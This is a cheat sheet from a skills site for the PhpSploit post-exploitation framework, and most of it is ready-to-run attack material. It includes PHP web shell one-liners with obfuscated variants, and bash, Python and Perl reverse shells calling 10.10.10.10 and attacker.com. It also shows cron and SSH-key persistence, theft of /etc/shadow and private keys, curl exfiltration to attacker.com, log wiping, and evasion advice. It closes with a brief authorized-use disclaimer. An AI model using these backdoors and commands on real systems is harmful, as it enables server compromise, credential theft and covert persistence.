Salta ai contenuti
1337skills 1337skills - Cheat Sheet

PhpSploit

Overview

Sezione intitolata “Overview”

PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.

Key Features:

  • Stealth PHP backdoor deployment
  • Interactive remote shell environment
  • File upload, download, and manipulation
  • System enumeration and reconnaissance
  • Memory-based operation (minimal disk footprint)
  • Anti-detection capabilities
  • Multi-session management

Installation

Sezione intitolata “Installation”

From GitHub

Sezione intitolata “From GitHub”
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploit

Requirements

Sezione intitolata “Requirements”
  • Python 3.6+
  • A web server with PHP execution capability
  • Target web server accessible

Verify Installation

Sezione intitolata “Verify Installation”
./phpsploit --version
./phpsploit --help

Docker

Sezione intitolata “Docker”
docker run -it --rm phpsploit

Basic Setup

Sezione intitolata “Basic Setup”

Start PhpSploit Console

Sezione intitolata “Start PhpSploit Console”
./phpsploit

Connect to Existing Backdoor

Sezione intitolata “Connect to Existing Backdoor”
phpsploit> connect http://target.com/shell.php

Deploy New Backdoor

Sezione intitolata “Deploy New Backdoor”
phpsploit> upload shell.php http://target.com/upload/

Interactive Shell

Sezione intitolata “Interactive Shell”
phpsploit> shell

Core Commands

Sezione intitolata “Core Commands”
CommandDescription
connectConnect to backdoor URL
uploadDeploy backdoor to server
downloadDownload file from server
shellInteractive command shell
runExecute system command
setConfigure framework settings
exploitRun exploitation modules
sessionsManage active sessions
helpDisplay command help
quitExit framework

Connection Management

Sezione intitolata “Connection Management”

Connect to Backdoor

Sezione intitolata “Connect to Backdoor”
phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.php

Connection with Proxy

Sezione intitolata “Connection with Proxy”
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.php

Authentication

Sezione intitolata “Authentication”
phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.php

Session Management

Sezione intitolata “Session Management”
phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1  # Kill session

Remote Command Execution

Sezione intitolata “Remote Command Execution”

Execute Single Command

Sezione intitolata “Execute Single Command”
phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -a

Interactive Shell Mode

Sezione intitolata “Interactive Shell Mode”
phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exit

Execute Shell Scripts

Sezione intitolata “Execute Shell Scripts”
phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'

Background Command Execution

Sezione intitolata “Background Command Execution”
phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &

File Operations

Sezione intitolata “File Operations”

Upload Files

Sezione intitolata “Upload Files”
phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/

Download Files

Sezione intitolata “Download Files”
phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dump

List Remote Directory

Sezione intitolata “List Remote Directory”
phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*

Create/Modify Files

Sezione intitolata “Create/Modify Files”
phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOF

System Enumeration

Sezione intitolata “System Enumeration”

Get System Information

Sezione intitolata “Get System Information”
phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run id

Network Information

Sezione intitolata “Network Information”
phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpn

Process Enumeration

Sezione intitolata “Process Enumeration”
phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginx

User and Privilege Information

Sezione intitolata “User and Privilege Information”
phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoers

Disk and Storage Information

Sezione intitolata “Disk and Storage Information”
phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblk

Backdoor Deployment

Sezione intitolata “Backdoor Deployment”

PHP Backdoor Creation

Sezione intitolata “PHP Backdoor Creation”
# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>

# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>

# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>

Deploy Backdoor via PhpSploit

Sezione intitolata “Deploy Backdoor via PhpSploit”
phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.php

Obfuscated Backdoor

Sezione intitolata “Obfuscated Backdoor”
# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>

# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>

Persistent Backdoor

Sezione intitolata “Persistent Backdoor”
# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.php

Post-Exploitation Workflows

Sezione intitolata “Post-Exploitation Workflows”

Privilege Escalation Enumeration

Sezione intitolata “Privilege Escalation Enumeration”
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontab

Credential Harvesting

Sezione intitolata “Credential Harvesting”
phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsa

Lateral Movement

Sezione intitolata “Lateral Movement”
# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a

# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTEN

Data Exfiltration

Sezione intitolata “Data Exfiltration”
# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/

# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64

# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64

Advanced Configuration

Sezione intitolata “Advanced Configuration”

Set User Agent

Sezione intitolata “Set User Agent”
phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"

Proxy Configuration

Sezione intitolata “Proxy Configuration”
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050

Timeout Settings

Sezione intitolata “Timeout Settings”
phpsploit> set timeout 30
phpsploit> set connect_timeout 10

Request Headers

Sezione intitolata “Request Headers”
phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"

Verbosity and Logging

Sezione intitolata “Verbosity and Logging”
phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.log

Exploitation Techniques

Sezione intitolata “Exploitation Techniques”

Reverse Shell Deployment

Sezione intitolata “Reverse Shell Deployment”
# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &

# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"

# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"

Cron Job Persistence

Sezione intitolata “Cron Job Persistence”
phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -

SSH Key Injection

Sezione intitolata “SSH Key Injection”
phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Database Access

Sezione intitolata “Database Access”
phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"

Defense Evasion

Sezione intitolata “Defense Evasion”

Process Hiding

Sezione intitolata “Process Hiding”
# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/command

Timestamp Manipulation

Sezione intitolata “Timestamp Manipulation”
phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.php

Log Sanitization

Sezione intitolata “Log Sanitization”
phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_history

Firewall Bypass

Sezione intitolata “Firewall Bypass”
# DNS tunneling
phpsploit> run nslookup attacker.com

# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)

Scripting and Automation

Sezione intitolata “Scripting and Automation”

Create PhpSploit Script

Sezione intitolata “Create PhpSploit Script”
#!/bin/bash
# automated_exploitation.sh

TARGET="http://target.com/shell.php"

phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOF

Batch Command Execution

Sezione intitolata “Batch Command Execution”
phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'

Real-World Attack Scenarios

Sezione intitolata “Real-World Attack Scenarios”

Web Server Compromise

Sezione intitolata “Web Server Compromise”
# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/

# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php

# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id

# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.php

Database Extraction

Sezione intitolata “Database Extraction”
# Identify database
phpsploit> run find / -name "*.env" | grep -i database

# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE

# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sql

Application Server Escalation

Sezione intitolata “Application Server Escalation”
# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"

# Check for vulnerable services
phpsploit> run netstat -tulpn

# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null

Troubleshooting

Sezione intitolata “Troubleshooting”

Connection Issues

Sezione intitolata “Connection Issues”
# Verify backdoor accessibility
curl http://target.com/shell.php

# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.php

Command Execution Problems

Sezione intitolata “Command Execution Problems”
# Test basic commands
phpsploit> run echo test
phpsploit> run id

# Check PHP version
phpsploit> run php --version

File Transfer Issues

Sezione intitolata “File Transfer Issues”
# Verify file permissions
phpsploit> run ls -la /var/www/html/

# Check available space
phpsploit> run df -h /var/www/html/

Security Best Practices

Sezione intitolata “Security Best Practices”

Operational Security

Sezione intitolata “Operational Security”
  • Use VPN/proxy for all connections
  • Rotate backdoor locations regularly
  • Clean logs and evidence of activity
  • Use encrypted communication when possible
  • Establish dead drops for communication

Detection Avoidance

Sezione intitolata “Detection Avoidance”
  • Use legitimate PHP functions
  • Avoid suspicious filenames
  • Minimize footprint on disk
  • Use appropriate timing for activities
  • Monitor system for detection indicators

Version and Support

Sezione intitolata “Version and Support”
./phpsploit --version
Sezione intitolata “Legal and Ethical Considerations”

Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.